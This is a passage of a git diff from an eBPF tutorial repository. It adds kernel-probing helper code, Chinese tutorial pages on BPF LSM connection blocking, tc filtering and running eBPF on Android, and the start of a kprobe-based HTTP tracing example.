if (!f) + return false; + + while (true) { + ret = fscanf(f, "%*x %*c %s%*[^\n]\n", sym_name); + if (ret == EOF && feof(f)) + break; + if (ret != 1) { + fprintf(stderr, "failed to read symbol from kallsyms\n"); + break; + } + if (!strcmp(name, sym_name)) { + fclose(f); + return true; + } + } + + fclose(f); + return false; +} + +bool tracepoint_exists(const char *category, const char *event) +{ + char path[PATH_MAX]; + + snprintf(path, sizeof(path), "/sys/kernel/debug/tracing/events/%s/%s/format", category, event); + if (!access(path, F_OK)) + return true; + return false; +} + +bool vmlinux_btf_exists(void) +{ + struct btf *btf; + int err; + + btf = btf__load_vmlinux_btf(); + err = libbpf_get_error(btf); + if (err) + return false; + + btf__free(btf); + return true; +} + +bool module_btf_exists(const char *mod) +{ + char sysfs_mod[80]; + + if (mod) { + snprintf(sysfs_mod, sizeof(sysfs_mod), "/sys/kernel/btf/%s", mod); + if (!access(sysfs_mod, R_OK)) + return true; + } + return false; +} + +bool probe_tp_btf(const char *name) +{ + LIBBPF_OPTS(bpf_prog_load_opts, opts, .expected_attach_type = BPF_TRACE_RAW_TP); + struct bpf_insn insns[] = { + { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 }, + { .code = BPF_JMP | BPF_EXIT }, + }; + int fd, insn_cnt = sizeof(insns) / sizeof(struct bpf_insn); + + opts.attach_btf_id = libbpf_find_vmlinux_btf_id(name, BPF_TRACE_RAW_TP); + fd = bpf_prog_load(BPF_PROG_TYPE_TRACING, NULL, "GPL", insns, insn_cnt, &opts); + if (fd >= 0) + close(fd); + return fd >= 0; +} + +bool probe_ringbuf() +{ + int map_fd; + + map_fd = bpf_map_create(BPF_MAP_TYPE_RINGBUF, NULL, 0, 0, getpagesize(), NULL); + if (map_fd < 0) + return false; + + close(map_fd); + return true; +} diff --git a/17-biopattern/trace_helpers.h b/17-biopattern/trace_helpers.h new file mode 100644 index 0000000..171bc4e --- /dev/null +++ b/17-biopattern/trace_helpers.h @@ -0,0 +1,104 @@ +/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ +#ifndef __TRACE_HELPERS_H +#define __TRACE_HELPERS_H + +#include + +#define NSEC_PER_SEC 1000000000ULL + +struct ksym { + const char *name; + unsigned long addr; +}; + +struct ksyms; + +struct ksyms *ksyms__load(void); +void ksyms__free(struct ksyms *ksyms); +const struct ksym *ksyms__map_addr(const struct ksyms *ksyms, + unsigned long addr); +const struct ksym *ksyms__get_symbol(const struct ksyms *ksyms, + const char *name); + +struct sym { + const char *name; + unsigned long start; + unsigned long size; + unsigned long offset; +}; + +struct syms; + +struct syms *syms__load_pid(int tgid); +struct syms *syms__load_file(const char *fname); +void syms__free(struct syms *syms); +const struct sym *syms__map_addr(const struct syms *syms, unsigned long addr); +const struct sym *syms__map_addr_dso(const struct syms *syms, unsigned long addr, + char **dso_name, unsigned long *dso_offset); + +struct syms_cache; + +struct syms_cache *syms_cache__new(int nr); +struct syms *syms_cache__get_syms(struct syms_cache *syms_cache, int tgid); +void syms_cache__free(struct syms_cache *syms_cache); + +struct partition { + char *name; + unsigned int dev; +}; + +struct partitions; + +struct partitions *partitions__load(void); +void partitions__free(struct partitions *partitions); +const struct partition * +partitions__get_by_dev(const struct partitions *partitions, unsigned int dev); +const struct partition * +partitions__get_by_name(const struct partitions *partitions, const char *name); + +void print_log2_hist(unsigned int *vals, int vals_size, const char 
*val_type); +void print_linear_hist(unsigned int *vals, int vals_size, unsigned int base, + unsigned int step, const char *val_type); + +unsigned long long get_ktime_ns(void); + +bool is_kernel_module(const char *name); + +/* + * When attempting to use kprobe/kretprobe, please check out new fentry/fexit + * probes, as they provide better performance and usability. But in some + * situations we have to fallback to kprobe/kretprobe probes. This helper + * is used to detect fentry/fexit support for the specified kernel function. + * + * 1. A gap between kernel versions, kernel BTF is exposed + * starting from 5.4 kernel. but fentry/fexit is actually + * supported starting from 5.5. + * 2. Whether kernel supports module BTF or not + * + * *name* is the name of a kernel function to be attached to, which can be + * from vmlinux or a kernel module. + * *mod* is a hint that indicates the *name* may reside in module BTF, + * if NULL, it means *name* belongs to vmlinux. + */ +bool fentry_can_attach(const char *name, const char *mod); + +/* + * The name of a kernel function to be attached to may be changed between + * kernel releases. This helper is used to confirm whether the target kernel + * uses a certain function name before attaching. + * + * It is achieved by scaning + * /sys/kernel/debug/tracing/available_filter_functions + * If this file does not exist, it fallbacks to parse /proc/kallsyms, + * which is slower. + */ +bool kprobe_exists(const char *name); +bool tracepoint_exists(const char *category, const char *event); + +bool vmlinux_btf_exists(void); +bool module_btf_exists(const char *mod); + +bool probe_tp_btf(const char *name); +bool probe_ringbuf(); + +#endif /* __TRACE_HELPERS_H */ diff --git a/18-further-reading/index.html b/18-further-reading/index.html index 0d8a574..5577eef 100644 --- a/18-further-reading/index.html +++ b/18-further-reading/index.html @@ -83,7 +83,7 @@ diff --git a/19-lsm-connect/index.html b/19-lsm-connect/index.html index 53dd263..3e12cb6 100644 --- a/19-lsm-connect/index.html +++ b/19-lsm-connect/index.html @@ -83,7 +83,7 @@ @@ -145,6 +145,7 @@

eBPF 入门实践教程:使用 LSM 进行安全检测防御

+

eBPF (扩展的伯克利数据包过滤器) 是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。这个特性使得 eBPF 能够提供极高的灵活性和性能,使其在网络和系统性能分析方面具有广泛的应用。安全方面的 eBPF 应用也是如此,本文将介绍如何使用 eBPF LSM(Linux Security Modules)机制实现一个简单的安全检查程序。

背景

LSM 从 Linux 2.6 开始成为官方内核的一个安全框架,基于此的安全实现包括 SELinux 和 AppArmor 等。在 Linux 5.7 引入 BPF LSM 后,系统开发人员已经能够自由地实现函数粒度的安全检查能力,本文就提供了这样一个案例:限制通过 socket connect 函数对特定 IPv4 地址进行访问的 BPF LSM 程序。(可见其控制精度是很高的)

LSM 概述

@@ -261,10 +262,10 @@ Retrying. wget-7061 [000] d...1 6318.800698: bpf_trace_printk: lsm: found connect to 16843009 wget-7061 [000] d...1 6318.800700: bpf_trace_printk: lsm: blocking 16843009
+

完整源代码:https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/19-lsm-connect

总结

本文介绍了如何使用 BPF LSM 来限制通过 socket 对特定 IPv4 地址的访问。我们可以通过修改 GRUB 配置文件来开启 LSM 的 BPF 挂载点。在 eBPF 程序中,我们通过 BPF_PROG 宏定义函数,并通过 SEC 宏指定挂载点;在函数实现上,遵循 LSM 安全检查模块中 "cannot override a denial" 的原则,并根据 socket 连接请求的目的地址对该请求进行限制。
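    作为补充,下面给出该程序内核态部分的一个最小化示意(代码经过简化,省略了部分检查;其中 16843009 即上文日志中出现的目的地址,等价于 1.1.1.1,完整实现请以仓库源码为准):

    // SPDX-License-Identifier: GPL-2.0
    #include "vmlinux.h"
    #include <bpf/bpf_helpers.h>
    #include <bpf/bpf_tracing.h>

    char LICENSE[] SEC("license") = "GPL";

    #define EPERM 1
    #define AF_INET 2

    // 16843009 == 0x01010101,即要拦截的目的地址 1.1.1.1
    const __u32 blockme = 16843009;

    SEC("lsm/socket_connect")
    int BPF_PROG(restrict_connect, struct socket *sock, struct sockaddr *address,
                 int addrlen, int ret)
    {
        // 遵循 "cannot override a denial":前面的检查已拒绝则直接透传该结果
        if (ret != 0)
            return ret;

        // 只检查 IPv4 连接请求
        if (address->sa_family != AF_INET)
            return 0;

        struct sockaddr_in *addr = (struct sockaddr_in *)address;
        __u32 dest = addr->sin_addr.s_addr;
        bpf_printk("lsm: found connect to %d", dest);

        if (dest == blockme) {
            bpf_printk("lsm: blocking %d", dest);
            return -EPERM;
        }
        return 0;
    }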

-

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

参考

diff --git a/20-tc/index.html b/20-tc/index.html index c7fd0c1..562fbc9 100644 --- a/20-tc/index.html +++ b/20-tc/index.html @@ -83,7 +83,7 @@ @@ -144,7 +144,7 @@
-

eBPF 入门实践教程:使用 eBPF 进行 tc 流量控制

+

eBPF 入门实践教程二十:使用 eBPF 进行 tc 流量控制

背景

Linux 的流量控制子系统(Traffic Control, tc)在内核中已经存在了多年:与 iptables 和 netfilter 的关系类似,tc 也包括一个用户态的 tc 程序和内核态的 traffic control 框架,主要用于从速率、顺序等方面控制数据包的发送和接收。从 Linux 4.1 开始,tc 增加了一些新的挂载点,并支持将 eBPF 程序作为 filter 加载到这些挂载点上。

tc 概述

@@ -215,8 +215,7 @@ Packing ebpf object and config into package.json...

总结

本文介绍了如何向 TC 流量控制子系统挂载 eBPF 类型的 filter 来实现对链路层数据包的排队处理。基于 eunomia-bpf 提供的通过注释向 libbpf 传递参数的方案,我们可以将自己编写的 tc BPF 程序以指定选项挂载到目标网络设备,并借助内核的 sk_buff 结构对数据包进行过滤处理。
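    作为参考,下面给出一个可挂载到 tc 挂载点的最小 eBPF filter 骨架(示意代码,仅解析 IPv4 报文并打印部分字段后放行;具体的挂载选项和注释写法请以教程源码为准):

    // SPDX-License-Identifier: GPL-2.0
    #include "vmlinux.h"
    #include <bpf/bpf_helpers.h>
    #include <bpf/bpf_endian.h>

    #define TC_ACT_OK 0
    #define ETH_P_IP  0x0800 /* IPv4 的以太网协议号 */

    char LICENSE[] SEC("license") = "GPL";

    SEC("tc")
    int tc_ingress(struct __sk_buff *ctx)
    {
        void *data_end = (void *)(__u64)ctx->data_end;
        void *data = (void *)(__u64)ctx->data;
        struct ethhdr *l2;
        struct iphdr *l3;

        // 只处理 IPv4 报文
        if (ctx->protocol != bpf_htons(ETH_P_IP))
            return TC_ACT_OK;

        // 逐层做边界检查,确保不会越界访问
        l2 = data;
        if ((void *)(l2 + 1) > data_end)
            return TC_ACT_OK;

        l3 = (struct iphdr *)(l2 + 1);
        if ((void *)(l3 + 1) > data_end)
            return TC_ACT_OK;

        bpf_printk("Got IP packet: tot_len: %d, ttl: %d",
                   bpf_ntohs(l3->tot_len), l3->ttl);
        return TC_ACT_OK;
    }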

-

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

参考

  • http://just4coding.com/2022/08/05/tc/
  • @@ -231,7 +230,7 @@ Packing ebpf object and config into package.json... - @@ -245,7 +244,7 @@ Packing ebpf object and config into package.json... - diff --git a/22-android/index.html b/22-android/index.html new file mode 100644 index 0000000..6c0ead2 --- /dev/null +++ b/22-android/index.html @@ -0,0 +1,332 @@ + + + + + + 在 Android 上使用 eBPF 程序 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    在 Android 上使用 eBPF 程序

    +
    +

    本文主要记录了笔者在 Android Studio Emulator 中测试高版本 Android Kernel 对基于 libbpf 的 CO-RE 技术支持程度的探索过程、结果和遇到的问题。 +测试采用的方式是在 Android Shell 环境下构建 Debian 环境,并基于此尝试构建 eunomia-bpf 工具链、运行其测试用例。

    +
    +

    背景

    +

    截至目前(2023-04),Android 还未对 eBPF 程序的动态加载做出较好的支持,无论是以 bcc 为代表的带编译器分发方案,还是基于 btf 和 libbpf 的 CO-RE 方案,都在较大程度上离不开 Linux 环境的支持,无法在 Android 系统上很好地运行1

    +

    虽然如此,在 Android 平台上尝试 eBPF 也已经有了一些成功案例,除谷歌官方提供的修改 Android.bp 以将 eBPF 程序随整个系统一同构建并挂载的方案2,也有人提出基于 Android 内核构建 Linux 环境进而运行 eBPF 工具链的思路,并开发了相关工具。

    +

    目前已有的资料,大多基于 adeb/eadb 在 Android 内核基础上构建 Linux 沙箱,并对 bcc 和 bpftrace 相关工具链进行测试,而对 CO-RE 方案的测试工作较少。在 Android 上使用 bcc 工具目前有较多参考资料,如:

    + +

    其主要思路是利用 chroot 在 Android 内核上运行一个 Debian 镜像,并在其中构建整个 bcc 工具链,从而使用 eBPF 工具。如果想要使用 bpftrace,原理也是类似的。

    +

    事实上,高版本的 Android 内核已支持 btf 选项,这意味着 eBPF 领域中新兴的 CO-RE 技术也应当能够运用到基于 Android 内核的 Linux 系统中。本文将基于此对 eunomia-bpf 在模拟器环境下进行测试运行。

    +
    +

    eunomia-bpf 是一个结合了 libbpf 和 WebAssembly 技术的开源项目,旨在简化 eBPF 程序的编写、编译和部署。该项目可被视作 CO-RE 的一种实践方式,其核心依赖是 libbpf,相信对 eunomia-bpf 的测试工作能够为其他 CO-RE 方案提供参考。

    +
    +

    测试环境

    +
      +
    • Android Emulator(Android Studio Flamingo | 2022.2.1)
    • +
    • AVD: Pixel 6
    • +
    • Android Image: Tiramisu Android 13.0 x86_64(5.15.41-android13-8-00055-g4f5025129fe8-ab8949913)
    • +
    +

    环境搭建3

    +
      +
    1. eadb 仓库 的 releases 页面获取 debianfs-amd64-full.tar.gz 作为 Linux 环境的 rootfs,同时还需要获取该项目的 assets 目录来构建环境;
    2. +
    3. 从 Android Studio 的 Device Manager 配置并启动 Android Virtual Device;
    4. +
    5. 通过 Android Studio SDK 的 adb 工具将 debianfs-amd64-full.tar.gzassets 目录推送到 AVD 中: +
        +
      • ./adb push debianfs-amd64-full.tar.gz /data/local/tmp/deb.tar.gz
      • +
      • ./adb push assets /data/local/tmp/assets
      • +
      +
    6. +
    7. 通过 adb 进入 Android shell 环境并获取 root 权限: +
        +
      • ./adb shell
      • +
      • su
      • +
      +
    8. +
    9. 在 Android shell 中构建并进入 debian 环境: +
        +
      • mkdir -p /data/eadb
      • +
      • mv /data/local/tmp/assets/* /data/eadb
      • +
      • mv /data/local/tmp/deb.tar.gz /data/eadb/deb.tar.gz
      • +
      • rm -r /data/local/tmp/assets
      • +
      • chmod +x /data/eadb/device-*
      • +
      • /data/eadb/device-unpack
      • +
      • /data/eadb/run /data/eadb/debian
      • +
      +
    10. +
    +

    至此,测试 eBPF 所需的 Linux 环境已经构建完毕。此外,在 Android shell 中(未进入 debian 时)可以通过 zcat /proc/config.gz 并配合 grep 查看内核编译选项。
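    除了查看 /proc/config.gz,也可以在用户态程序中直接探测内核是否携带 BTF(这是 CO-RE 的前提),思路与前文 trace_helpers 中的 vmlinux_btf_exists() 相同。下面是一个基于 libbpf 的示意程序:

    #include <stdbool.h>
    #include <stdio.h>
    #include <bpf/btf.h>
    #include <bpf/libbpf.h>

    /* 尝试加载 vmlinux BTF:加载成功说明内核开启了 CONFIG_DEBUG_INFO_BTF */
    static bool vmlinux_btf_available(void)
    {
        struct btf *btf = btf__load_vmlinux_btf();

        if (libbpf_get_error(btf))
            return false;
        btf__free(btf);
        return true;
    }

    int main(void)
    {
        printf("vmlinux BTF: %s\n",
               vmlinux_btf_available() ? "available" : "missing");
        return 0;
    }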

    +
    +

    目前,eadb 打包的 debian 环境存在 libc 版本较低、缺少较多工具依赖等问题;并且由于内核编译选项不同,一些 eBPF 功能可能也无法使用。

    +
    +

    工具构建

    +

    在 debian 环境中将 eunomia-bpf 仓库 clone 到本地,具体的构建过程,可以参考仓库的 build.md。在本次测试中,笔者选用了 ecc 编译生成 package.json 的方式,该工具的构建和使用方式请参考仓库页面

    +
    +

    在构建过程中,可能需要自行安装包括但不限于 curlpkg-configlibssl-dev 等工具。

    +
    +

    结果

    +

    有部分 eBPF 程序可以成功在 Android 上运行,但也会有部分应用因为种种原因无法成功被执行。

    +

    成功案例

    +

    bootstrap

    +

    运行输出如下:

    +
    TIME     PID     PPID    EXIT_CODE  DURATION_NS  COMM    FILENAME  EXIT_EVENT
    +09:09:19  10217  479     0          0            sh      /system/bin/sh 0
    +09:09:19  10217  479     0          0            ps      /system/bin/ps 0
    +09:09:19  10217  479     0          54352100     ps                1
    +09:09:21  10219  479     0          0            sh      /system/bin/sh 0
    +09:09:21  10219  479     0          0            ps      /system/bin/ps 0
    +09:09:21  10219  479     0          44260900     ps                1
    +
    +

    tcpstates

    +

    开始监测后在 Linux 环境中通过 wget 下载 Web 页面:

    +
    TIME     SADDR   DADDR   SKADDR  TS_US   DELTA_US  PID     OLDSTATE  NEWSTATE  FAMILY  SPORT   DPORT   TASK
    +09:07:46  0x4007000200005000000000000f02000a 0x5000000000000f02000a8bc53f77 18446635827774444352 3315344998 0 10115 7 2 2 0 80 wget
    +09:07:46  0x40020002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315465870 120872 0 2 1 2 55694 80 swapper/0
    +09:07:46  0x40010002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315668799 202929 10115 1 4 2 55694 80 wget
    +09:07:46  0x40040002d98e50003d99f8090f02000a 0xd98e50003d99f8090f02000a8bc53f77 18446635827774444352 3315670037 1237 0 4 5 2 55694 80 swapper/0
    +09:07:46  0x40050002000050003d99f8090f02000a 0x50003d99f8090f02000a8bc53f77 18446635827774444352 3315670225 188 0 5 7 2 55694 80 swapper/0
    +09:07:47  0x400200020000bb01565811650f02000a 0xbb01565811650f02000a6aa0d9ac 18446635828348806592 3316433261 0 2546 2 7 2 49970 443 ChromiumNet
    +09:07:47  0x400200020000bb01db794a690f02000a 0xbb01db794a690f02000aea2afb8e 18446635827774427776 3316535591 0 1469 2 7 2 37386 443 ChromiumNet
    +
    +

    开始检测后在 Android Studio 模拟界面打开 Chrome 浏览器并访问百度页面:

    +
    TIME     SADDR   DADDR   SKADDR  TS_US   DELTA_US  PID     OLDSTATE  NEWSTATE  FAMILY  SPORT   DPORT   TASK
    +07:46:58  0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020066638144 192874641 0 3305 7 2 2 0 443 NetworkService
    +07:46:58  0x40020002d28abb01494b6ebe0f02000a 0xd28abb01494b6ebe0f02000aeb6f2270 18446631020066638144 192921938 47297 3305 2 1 2 53898 443 NetworkService
    +07:46:58  0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132433920 193111426 0 3305 7 2 2 0 443 NetworkService
    +07:46:58  0x40020002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193124670 13244 3305 2 1 2 46240 443 NetworkService
    +07:46:58  0x40010002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193185397 60727 3305 1 4 2 46240 443 NetworkService
    +07:46:58  0x40040002b4a0bb0179ff85e80f02000a 0xb4a0bb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186122 724 3305 4 5 2 46240 443 NetworkService
    +07:46:58  0x400500020000bb0179ff85e80f02000a 0xbb0179ff85e80f02000ae7e7e8b7 18446631020132433920 193186244 122 3305 5 7 2 46240 443 NetworkService
    +07:46:59  0x40010002d01ebb01d0c52f5c0f02000a 0xd01ebb01d0c52f5c0f02000a51449c27 18446631020103553856 194110884 0 5130 1 8 2 53278 443 ThreadPoolForeg
    +07:46:59  0x400800020000bb01d0c52f5c0f02000a 0xbb01d0c52f5c0f02000a51449c27 18446631020103553856 194121000 10116 3305 8 7 2 53278 443 NetworkService
    +07:46:59  0x400700020000bb01000000000f02000a 0xbb01000000000f02000aeb6f2270 18446631020099513920 194603677 0 3305 7 2 2 0 443 NetworkService
    +07:46:59  0x40020002d28ebb0182dd92990f02000a 0xd28ebb0182dd92990f02000aeb6f2270 18446631020099513920 194649313 45635 12 2 1 2 53902 443 ksoftirqd/0
    +07:47:00  0x400700020000bb01000000000f02000a 0xbb01000000000f02000a26f6e878 18446631020132433920 195193350 0 3305 7 2 2 0 443 NetworkService
    +07:47:00  0x40020002ba32bb01e0e09e3a0f02000a 0xba32bb01e0e09e3a0f02000a26f6e878 18446631020132433920 195206992 13642 0 2 1 2 47666 443 swapper/0
    +07:47:00  0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132448128 195233125 0 3305 7 2 2 0 443 NetworkService
    +07:47:00  0x40020002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195246569 13444 3305 2 1 2 46248 443 NetworkService
    +07:47:00  0xf02000affff00000000000000000000 0x1aca06cffff00000000000000000000 18446631019225912320 195383897 0 947 7 2 10 0 80 Thread-11
    +07:47:00  0x40010002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195421584 175014 3305 1 4 2 46248 443 NetworkService
    +07:47:00  0x40040002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422361 777 3305 4 5 2 46248 443 NetworkService
    +07:47:00  0x400500020000bb0136cac8dd0f02000a 0xbb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422450 88 3305 5 7 2 46248 443 NetworkService
    +07:47:01  0x400700020000bb01000000000f02000a 0xbb01000000000f02000aea2afb8e 18446631020099528128 196321556 0 1315 7 2 2 0 443 ChromiumNet
    +
    +

    一些可能的报错原因

    +

    opensnoop

    +

    例如 opensnoop 工具,可以在 Android 上成功构建,但运行报错:

    +
    libbpf: failed to determine tracepoint 'syscalls/sys_enter_open' perf event ID: No such file or directory
    +libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to create tracepoint 'syscalls/sys_enter_open' perf event: No such file or directory
    +libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to auto-attach: -2
    +failed to attach skeleton
    +Error: BpfError("load and attach ebpf program failed")
    +
    +

    后经查看发现内核未开启 CONFIG_FTRACE_SYSCALLS 选项,导致无法使用 syscalls 的 tracepoint。
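    遇到这种情况,一个可能的规避思路是不依赖 syscalls tracepoint,改用 kprobe 挂载到对应的内核函数。下面给出一个示意程序(do_sys_openat2 这一函数名会随内核版本变化,这里仅作假设举例,并非 opensnoop 的原始实现):

    // SPDX-License-Identifier: GPL-2.0
    #include "vmlinux.h"
    #include <bpf/bpf_helpers.h>
    #include <bpf/bpf_tracing.h>

    char LICENSE[] SEC("license") = "Dual BSD/GPL";

    // 以 kprobe 方式跟踪 openat 类调用,不依赖 CONFIG_FTRACE_SYSCALLS
    SEC("kprobe/do_sys_openat2")
    int BPF_KPROBE(trace_openat2, int dfd, const char *filename)
    {
        char fname[256];

        bpf_probe_read_user_str(fname, sizeof(fname), filename);
        bpf_printk("openat: %s", fname);
        return 0;
    }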

    +

    总结

    +

    在 Android shell 中查看内核编译选项可以发现 CONFIG_DEBUG_INFO_BTF 默认是打开的,在此基础上 eunomia-bpf 项目提供的 example 已有一些能够成功运行的案例,例如可以监测 exec 族函数的执行和 tcp 连接的状态。

    +

    对于无法成功运行的程序,原因主要有以下两个方面:

    1. 内核编译选项未支持相关 eBPF 功能;
    2. eadb 打包的 Linux 环境较弱,缺乏必需的依赖。
    +

    目前在 Android 系统中使用 eBPF 工具基本上仍然需要构建完整的 Linux 运行环境,但 Android 内核本身对 eBPF 的支持已较为全面,本次测试证明较高版本的 Android 内核支持 BTF 调试信息和依赖 CO-RE 的 eBPF 程序的运行。

    +

    Android 系统 eBPF 工具的发展需要官方新特性的加入,目前看来通过 Android APP 直接使用 eBPF 工具需要的工作量较大,同时由于 eBPF 工具需要 root 权限,普通 Android 用户的使用会面临较多困难。

    +

    如果希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

    +

    参考

    + + +
    + + +
    +
    + + + +
    + + + + + + + + + + + + + + + + + + +
    + + diff --git a/23-http/index.html b/23-http/index.html new file mode 100644 index 0000000..31c65b4 --- /dev/null +++ b/23-http/index.html @@ -0,0 +1,200 @@ + + + + + + 使用 eBPF 追踪 HTTP 请求或其他七层协议 - bpf-developer-tutorial + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + + + + + + + + + + + + + + +
    + +
    + + + + + + + + +
    +
    +

    http

    +

    TODO

    + +
    + + +
    +
    + + + +
    + + + + + + + + + + + + + + + + + + +
    + + diff --git a/23-http/main.go b/23-http/main.go new file mode 100644 index 0000000..608e85d --- /dev/null +++ b/23-http/main.go @@ -0,0 +1,103 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + + package main + + import ( + "fmt" + bpfwrapper2 "github.com/seek-ret/ebpf-training/workshop1/internal/bpfwrapper" + "github.com/seek-ret/ebpf-training/workshop1/internal/connections" + "github.com/seek-ret/ebpf-training/workshop1/internal/settings" + "io/ioutil" + "log" + "os" + "os/signal" + "os/user" + "runtime/debug" + "syscall" + "time" + + "github.com/iovisor/gobpf/bcc" + ) + + // abortIfNotRoot checks the current user permissions, if the permissions are not elevated, we abort. + func abortIfNotRoot() { + current, err := user.Current() + if err != nil { + log.Panic(err) + } + + if current.Uid != "0" { + log.Panic("sniffer must run under superuser privileges") + } + } + + // recoverFromCrashes is a defer function that caches all panics being thrown from the application. + func recoverFromCrashes() { + if err := recover(); err != nil { + log.Printf("Application crashed: %v\nstack: %s\n", err, string(debug.Stack())) + } + } + + func main() { + if len(os.Args) != 2 { + fmt.Println("Usage: go run main.go ") + os.Exit(1) + } + bpfSourceCodeFile := os.Args[1] + bpfSourceCodeContent, err := ioutil.ReadFile(bpfSourceCodeFile) + if err != nil { + log.Panic(err) + } + + defer recoverFromCrashes() + abortIfNotRoot() + + if err := settings.InitRealTimeOffset(); err != nil { + log.Printf("Failed fixing BPF clock, timings will be offseted: %v", err) + } + + // Catching all termination signals to perform a cleanup when being stopped. + sig := make(chan os.Signal, 1) + signal.Notify(sig, syscall.SIGHUP, syscall.SIGINT, syscall.SIGQUIT, syscall.SIGTERM) + + bpfModule := bcc.NewModule(string(bpfSourceCodeContent), nil) + if bpfModule == nil { + log.Panic("bpf is nil") + } + defer bpfModule.Close() + + connectionFactory := connections.NewFactory(time.Minute) + go func() { + for { + connectionFactory.HandleReadyConnections() + time.Sleep(10 * time.Second) + } + }() + if err := bpfwrapper2.LaunchPerfBufferConsumers(bpfModule, connectionFactory); err != nil { + log.Panic(err) + } + + // Lastly, after everything is ready and configured, attach the kprobes and start capturing traffic. + if err := bpfwrapper2.AttachKprobes(bpfModule); err != nil { + log.Panic(err) + } + log.Println("Sniffer is ready") + <-sig + log.Println("Signaled to terminate") + } diff --git a/23-http/sourcecode.c b/23-http/sourcecode.c new file mode 100644 index 0000000..01bfc92 --- /dev/null +++ b/23-http/sourcecode.c @@ -0,0 +1,497 @@ +// +build ignore + +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. 
+ * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +#include +#include +#include +#include + +// Defines + +#define socklen_t size_t + +// Data buffer message size. BPF can submit at most this amount of data to a perf buffer. +// Kernel size limit is 32KiB. See https://github.com/iovisor/bcc/issues/2519 for more details. +#define MAX_MSG_SIZE 30720 // 30KiB + +// This defines how many chunks a perf_submit can support. +// This applies to messages that are over MAX_MSG_SIZE, +// and effectively makes the maximum message size to be CHUNK_LIMIT*MAX_MSG_SIZE. +#define CHUNK_LIMIT 4 + +enum traffic_direction_t { + kEgress, + kIngress, +}; + +// Structs + +// A struct representing a unique ID that is composed of the pid, the file +// descriptor and the creation time of the struct. +struct conn_id_t { + // Process ID + uint32_t pid; + // The file descriptor to the opened network connection. + int32_t fd; + // Timestamp at the initialization of the struct. + uint64_t tsid; +}; + +// This struct contains information collected when a connection is established, +// via an accept4() syscall. +struct conn_info_t { + // Connection identifier. + struct conn_id_t conn_id; + + // The number of bytes written/read on this connection. + int64_t wr_bytes; + int64_t rd_bytes; + + // A flag indicating we identified the connection as HTTP. + bool is_http; +}; + +// An helper struct that hold the addr argument of the syscall. +struct accept_args_t { + struct sockaddr_in* addr; +}; + +// An helper struct to cache input argument of read/write syscalls between the +// entry hook and the exit hook. +struct data_args_t { + int32_t fd; + const char* buf; +}; + +// An helper struct that hold the input arguments of the close syscall. +struct close_args_t { + int32_t fd; +}; + +// A struct describing the event that we send to the user mode upon a new connection. +struct socket_open_event_t { + // The time of the event. + uint64_t timestamp_ns; + // A unique ID for the connection. + struct conn_id_t conn_id; + // The address of the client. + struct sockaddr_in addr; +}; + +// Struct describing the close event being sent to the user mode. +struct socket_close_event_t { + // Timestamp of the close syscall + uint64_t timestamp_ns; + // The unique ID of the connection + struct conn_id_t conn_id; + // Total number of bytes written on that connection + int64_t wr_bytes; + // Total number of bytes read on that connection + int64_t rd_bytes; +}; + +struct socket_data_event_t { + // We split attributes into a separate struct, because 